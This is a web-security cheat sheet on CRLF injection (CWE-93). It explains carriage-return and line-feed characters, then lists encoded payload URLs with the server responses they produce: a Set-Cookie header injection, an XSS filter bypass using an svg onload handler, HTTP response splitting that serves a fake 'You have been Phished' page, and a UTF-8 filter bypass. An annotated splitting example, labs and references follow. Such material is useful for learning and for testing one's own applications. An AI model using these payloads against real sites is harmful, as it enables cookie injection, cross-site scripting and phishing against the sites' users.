CRLF

CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')

#What is CRLF injection?

CRLF injection is a vulnerability that lets a malicious hacker inject carriage return (CR) and linefeed (LF) characters to change the way a web application works or to confuse its administrator. There are two main malicious uses for CRLF injections: log poisoning (also called log injection, log splitting, or log forging) and HTTP response splitting.

Carriage Return Line Feed

The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

Summary

• CRLF - Add a cookie

• CRLF - Add a cookie - XSS Bypass

• CRLF - Write HTML

• CRLF - Filter Bypass

• Labs

• References

CRLF - Add a cookie

Requested page

http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue

HTTP Response

Connection: keep-alive
Content-Length: 178
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Location: https://www.example.net/[INJECTION STARTS HERE]
Set-Cookie: mycookie=myvalue
X-Frame-Options: SAMEORIGIN
X-Sucuri-ID: 15016
x-content-type-options: nosniff
x-xss-protection: 1; mode=block

CRLF - Add a cookie - XSS Bypass

Requested page

http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

HTTP Response

HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0

CRLF - Write HTML

Requested page

http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E

HTTP response

Set-Cookie:en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34

<html>You have been Phished</html>

CRLF - Filter Bypass

Using UTF-8 encoding

%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE

Remainder:

• %E5%98%8A = %0A = \u560a

• %E5%98%8D = %0D = \u560d

• %E5%98%BE = %3E = \u563e (>)

• %E5%98%BC = %3C = \u563c (<)

#What is log poisoning?

In a log poisoning attack based on CRLF injection, a malicious hacker injects CRLF chara​cters into web server log files to confuse both automatic log analysis systems and system administrators browsing the logs manually.

CRLF_Injection Example

• http://www.example.com/example.php?id= – starting a valid request to a page with a CRLF injection vulnerability.

• %0d%0aContent-Length:%200 – a fake HTTP response header of Content-Length: 0. This causes the web browser to treat this response as terminated and start parsing the next response.

• %0d%0a%0d%0aHTTP/1.1%20200%20OK – the injected new response begins here with a double CRLF sequence followed by HTTP/1.1 200 OK.

• %0d%0aContent-Type:%20text/html – another fake HTTP response header: Content-Type: text/html. This is required for the browser to treat this data as HTML content.

• %0d%0aContent-Length:%2025 – yet another fake HTTP response header: Content-Length: 25. This instructs the browser to parse only the next 25 bytes and discard any remaining data as junk, causing it to ignore the legitimate HTTP content sent by the web server.

• %0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E – a double CRLF sequence signals that the headers are over and the response body starts. The injected page content is <script>alert(1)</script>, which causes the user’s browser to display an alert instead of the actual example.php page.

Labs

• https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection

References

• https://salmonsec.com/cheatsheets/exploitation/crlf_injection
• https://www.owasp.org/index.php/CRLF_Injection

• https://vulners.com/hackerone/H1:192749